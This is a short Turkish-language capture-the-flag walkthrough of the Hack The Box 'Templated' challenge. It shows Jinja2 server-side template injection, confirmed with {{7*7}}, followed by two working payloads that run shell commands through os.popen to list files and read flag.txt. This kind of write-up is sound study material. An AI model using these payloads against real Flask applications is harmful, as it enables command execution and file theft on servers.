Hack The Box: Templated Walkthrough — giselle

Hack The Box: Templated Walkthrough

Merhaba, bugün Hack The Box’ta Templated Challenge çözümünü anlatacağım.

Bizi karşılayan ilk ekran bu. Flask/Jinja2 üzerine araştırma yapmaya başladım ve SSTI’ya karşı savunmasız olduğunu öğrendim. Bunu doğrulamak için {{7 * 7}} payload’ını gönderdim ve çalıştığını gördüm.

Ve gerçekten çalıştı! Yanıtı aldık. Jinja2 ile SSTI hakkında daha fazla bilgi için:

[https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/]

Dosyaları listelemek için şu komutu kullandım ve flag.txt dosyasını gördüm:

1{{request.application.__globals__.__builtins__.__import__('os').popen('ls -a').read()}}

Dosyayı okuyarak bayrağı aldım:

1{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag.txt').read()}}

Bayrağı bulduk, challenge tamamlandı. Hacklemaya devam!

Pratik mükemmelleştirir. :)